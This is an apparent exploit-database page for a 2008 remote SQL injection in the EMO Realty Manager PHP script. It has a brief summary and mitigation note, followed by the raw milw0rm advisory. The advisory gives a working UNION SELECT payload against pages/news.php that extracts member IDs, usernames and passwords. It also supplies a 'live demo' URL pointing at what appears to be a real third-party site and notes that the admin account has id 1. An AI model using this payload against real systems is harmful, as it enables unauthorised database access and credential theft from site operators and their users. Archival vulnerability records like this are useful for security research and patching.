Remote SQL Injection Vulnerabilities - EMO Realty Manager

vendor:

EMO Realty Manager

by:

HaCkeR_EgY

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: EMO Realty Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Remote SQL Injection Vulnerabilities – EMO Realty Manager

A remote SQL injection vulnerability exists in EMO Realty Manager. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to unauthorized information. This can be exploited to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements.

Source

Exploit-DB raw data:

##########################################################
#                    Remote SQL Injection Vulnerabilities                                             #
#                           EMO Realty Manager                                                          #
##########################################################
 
 
## Author : HaCkeR_EgY
 
## C0NTACT : hacker_egy@hotmail.com
 
 
## H^OME : www.PAL-HaCkeR.com   &  ATSDP.COM
 
 
## Script Name : EMO Realty Manager
 
 
## Download : http://www.emophp.com/
 
 
## Price : Manager Full License CAD $399   /// Manager Base License CAD $299=======>  Buy iT : http://www.emophp.com/purchase.php
 
 
###########################################################################
###########################################################################
 
## D0rk : mmmm...... U have 2 dork  ...Let's say use your Mind again  D:
 
 
## ExPlo!T :
 
=====>> http://target.com/path/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*
## L!ve Dem0 :
 
 
======>>http://sellrentcanada.com/aaa/pages/news.php?ida=-1/**/union/**/select/**/1,2,concat_ws(0x3a3a,id,member_name,member_password),4/**/from/**/members/*
 
-----N0TE----  Admin INFO  have (id) number 1
 
 
################################################################################

[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
 
[<>] Greetz : Mr.SQL , Mohamed el Arab ,F!resell, DaRk MaStEr , H-T Team , Stack-Terrorist
 
#################################################################################

# milw0rm.com [2008-05-13]